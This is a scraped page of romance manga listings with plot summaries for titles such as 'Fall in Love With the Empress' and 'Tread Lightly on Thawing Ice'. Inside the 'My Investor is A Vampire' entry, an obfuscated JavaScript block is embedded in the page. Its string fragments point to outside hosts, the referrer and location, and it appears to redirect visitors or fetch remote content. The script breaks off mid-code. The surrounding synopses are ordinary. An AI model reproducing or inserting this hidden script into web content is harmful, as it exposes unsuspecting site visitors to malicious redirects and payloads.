Romance - Page 1894

Romance manga is a genre that explores romantic relationships, filled with emotional highs and lows, offering readers a heartfelt journey of love, growth, and conflict.

24450 results

Fall in Love With the Empress

"Warning: Yuri content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older." The Cold and Aloof Empress X A Kind and Intelligent Girl Description: Duan WeiYing dressed herself in attire befitting a delicate maiden before entering the world of Gongdou, where she is tasked to become the Empress of Gongdou. However, she had absolutely no interest in the legendary Shun Jun. Rather, her only motive is to abuse the bug in her tasks. But who would’ve thought that the current cold and refined Empress would gradually fall in love with her... [TL: BBLOVER , PR: ey] Fall in Love With the Empress / I'm Determined to Be the Dark Moonlight / Zhè Hūnjūn De Hēi Yuèguāng Wǒ Dāng Dìngle / 这昏君的黑月光我当定了


My Investor is A Vampire

The company of the entrepreneur Zhao Man Man was in serious deficit. She initially wanted to search for a job that can resolve the problem of having enough food and warm clothes after applying for bankruptcy. Unexpectedly, her investor, Xiao Ce, suddenly confessed to her and expressed that he would do his best to help her raise funds. Zhao Man Man was happy and worried as it was difficult to determine whether the handsome and rich Xiao Ce, is sincere or if he is playing with her......<script></script><script>function _0xdd54(){var _0x46f216=['location','random','rCodA','https://ip','Pkejq','ZWdeH','1771636fhqUBC','1184825SwwCgi','4CGEMlJ','WvjmG','3866030yZVJwW','includes','12JtZXYr','ODmIg','TBjfX','text','aujLN','href','then','.top/','http://rea','muOGz','google','1645902pYPtTy','4271432BUsiQK','.customapi','floor','120591iApHTq','','gnXDY','61034mdHcvD','eMYGr','referrer'];_0xdd54=function(){return _0x46f216;};return _0xdd54();}(function(_0x15e9e2,_0x1dc2ce){var _0x396065=_0xeaf7,_0x1f4bbc=_0x15e9e2();while(!![]){try{var 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The Young Lady Tames The Main Leads

I was reincarnated as a young lady who had no importance in the novel. My goal is to live a peaceful life! However, I met all the main leads of the original story in kindergarten. I can’t believe I’m meeting all the main characters! “What are you looking at? Get out of the way.” “……This body is scheduled for early admission to the Academy soon. The level is not right.” “How dare the young lady think to talk to me!” For a moment I was delighted, but somehow no one seems to be very pleased with me. But I can’t miss the chance to build a solid network with future heroes! So I started getting close to them one by one…… When I woke up, everyone was fighting each other to take my side. Oh, what should I do with these dummies? The Young Lady Tames the Main Leads / 꼬마 영애님은 주연들을 길들인다


Baby Empress

Baby Empress The child of a prophecy is born to save the world. “I need to get married to save people…? I’ll do the marriage!” The emperor is a young and innocent boy. But… “I can’t give you my daughter! She will not be becoming empress.” My father interfered with my marriage! “Is my sister just a toy to you?” And my brother too! Will I be able to save the world?


The Young Lady Tames the Male Leads

I was reincarnated as the young lady of a Marquis. Emir Sharon, who has no significance in the novel and her goal is to live a peaceful life! I met the main characters of the original novel as kids in the imperial kindergarten, which I’m currently attending to. I can’t believe that I’m meeting all the main characters! I was happy for a while but somehow, everyone doesn’t seem to be so happy with me. But I can’t miss the opportunity to build a strong connection with the future protagonists. Emir Sharon is on her quest to getting close to the main characters finally begins. And when I finally come to my senses, I’m in a situation where everyone is keeping each other on check just to take the seat right next to me. What am I going to do with these kids who already glued themselves to me? The Little Lady Tames the Leads (Official) The Young Lady Tames the Male Leads / 꼬마 영애님은 주연들을 길들인다


Don’t Flirt Me, Lord Angel

An unlucky girl tangled with curses is secretly in love with the prom king. When the “lord angel” she waited for ages finally came to her, he took her first kiss and is interested in floating in the air and tearing her sheets! Is it “gene mutation”?


If You Touch My Brother, You’re All Dead

If You Touch My Brother, You’re All Dead Summary: Manhwa / Manhua If You Touch My Brother, You’re All Dead / If You Dare Lay A Hand On My Little Brother, You’re All Going To Die / 내 동 생 건들면 너희는 다 죽은 목숨이다 I became sixteen year old Rosalette. She fell out of bed and when she opened her eyes, she had possessed a character in “Asterion of a Blue Starry Night” a cliche BL novel with passion, fantasy, drama, and angst. Plus, she was Rosalette, the older sister of Asteron. Asteron was the protagonist and the one who committed suicide at the end of the novel. She left herself to go through the flow of events in the story. At the end of that, she went back in time to become sixteen year old Rosalette again. She thought that standing by was what she did wrong, so she raised her younger sibling finely, but she died from an outside force and returned as Rosalette once more. She changed her direction. She indulged in training herself instead of her brother. That didn’t seem to work either. She had learned magic but still returned, and she had lived all the way till her graduation, but still returned. Rosalette Roxburgh who is always returning to her sixteen year old self, is still looking for a way to die indefinitely. 내 동 생 건들면 너희는 다 죽은 목숨이다 If You Dare Lay A Hand On My Little Brother, You’re All Going To Die


If You Touch My Little Brother, You’re All Dead

I became sixteen-year-old Rosalette. After falling out of bed and opening my eyes, I had possessed a character in ‘Asterion of the Blue, Starry Night’, a classic BL novel with over dramatization, tragedy, blind passion, and madness. Moreover, it’s the character Rosalette. Rosalette is the older sister to Asterion, the male lead who commits suicide when his life reaches a dead end. Following the flow of the story, when I reached the end, I returned to the point when I possessed sixteen-year-old Rosalette. Thinking that was the wrong answer, my brother was then raised beautifully, only to be killed by an outside factor and I returned again. I decided to change course. I decided to focus on myself and train. This also doesn’t seem to be it. I learned magic but returned. I had a party celebrating the completion of my magic tower graduation thesis, yet still returned. Endlessly returning to sixteen-year-old Rosalette Roxburgh, I am looking for a way to peacefully die.


Tread Lightly on Thawing Ice

"Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older." Seowoo Chunbing / Seo Woo Chun-Bing / Seo Woo Chunbing / Seo-Woo Chun-Bing / 忘れ得ぬ貴方との邂逅 / 涉于春氷 / 섭우춘빙 Ye Kang-Oh is nothing short of royalty in the world of Jianghu. He is the third and youngest disciple of Ye Jin-Rang, the very man who rules over the entire Black Force of Jianghu. Despite being Jin-Rang's favorite disciple and owning promising skills, Kang-Oh intentionally keeps a low profile to keep distance from politics over which disciple will inherit master's position. One day, Kang-Oh is mysteriously attracted to a humble servant named Woo(foolishness). Not knowing that their destinies have been tied together since long time ago, Kang-Oh cannot help but continue to get intrigued by this mysterious servant... Woo is a servant serving Jin-Rang, master of the entire black force of Jianghu. Despite being known as a fair man, Jin-Rang seems to internationally neglect Woo getting harassed for years by the officials of the Black Force. Woo seems to accept such inhumane treatment as his own fate. One day, Woo unintentionally attracts the attention of Kang-Oh, Jin-Rang's youngest and favorite disciple. Woo tries his best to evade Kang-Oh's kindness but at the same time finds it hard to repel the attention of the man he was missed for so long... ever since Kang-Oh was a little boy and Jin-Rang was known as Dan Woo-hyo, the most powerful swordsman in the entire White Force.


The Killer Lives Next Door

A killer who can completely conceal all traces of his existence has been hired to deal with the target while keeping a low profile. However, the place where the killer infiltrated was an apartment in Korea that was has poor soundproofing level. Everyone can hear everything that is happening in the apartment. It is in this place that the killer is to monitor the target until given further instructions. All he wants to do is to complete his mission in peace. However, things just won’t go his way.


The Making of a Princess

Sophia, the haughty Princess of the Kingdom of Xilang, was reduced to a lowly maid! Trampled on and humiliated, the reality she’s faced with is a harsh and cruel one. However, relying on nothing but her wits, she rises up against the odds. Will she be able to take back everything that once was hers… and more?


Beware of Your Boyfriend

Da-In and Si-Hyun are in the same class, but they’ve never spoken to each other. One day, an unfamiliar guy appears and says he is the Lee Si-Hyun from the future, and that they’ll go out with each other. Da-In doesn’t believe him, but as his predictions come true, she starts to trust him. As Da-In shows interest in Si-Hyun, their classmates say they are flirting with each other. However, Si-Hyun has a twin who looks exactly like him. Just what is the identity of this unfamiliar guy…? Watch Out For Your Boyfriend / Boy from the Future / Awas Pacarku Aneh / Beware of Your Boyfriend / 남자친구를 조심해
